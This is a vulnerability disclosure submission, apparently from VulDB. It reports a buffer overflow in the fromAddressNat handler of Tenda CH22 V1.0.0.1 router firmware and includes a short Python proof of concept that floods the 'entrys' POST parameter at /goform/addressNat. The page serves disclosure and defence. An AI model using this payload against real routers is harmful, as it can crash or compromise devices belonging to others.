Submit #851699: Tenda CH22 V1.0.0.1 Buffer Overflowinfo

TitleTenda CH22 V1.0.0.1 Buffer Overflow
Description## Overview - Firmware download website: https://www.tenda.com.cn/download/2230 ## Affected version CH22 V1.0.0.1 ## Vulnerability details The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the `fromAddressNat` function. The `v8` variable receives the `entrys` parameter from a POST request and is later passed to the `sprintf` function. However, since the user can control the input of `entrys` , the statement `sprintf(s, "%s;%s", v8, v7);` can cause a buffer overflow. ## PoC import requests ip = "192.168.1.1" url = f'http://{ip}/goform/addressNat' payload = b'a' * 1000 data = {    'entrys':payload } requests.post(url, data=data)
Source⚠️ https://candle-throne-f75.notion.site/Tenda-CH22-fromAddressNat-377df0aa1185807ab2aef43f7f9791f9
User
 ysnysn0121 (UID 86198)
Submission06/08/2026 17:46 (1 month ago)
Moderation07/09/2026 07:54 (1 month later)
StatusDuplicate
VulDB entry329944 [Tenda CH22 1.0.0.1 /goform/addressNat fromAddressNat page buffer overflow]
Points0

Do you know our Splunk app?

Download it now for free!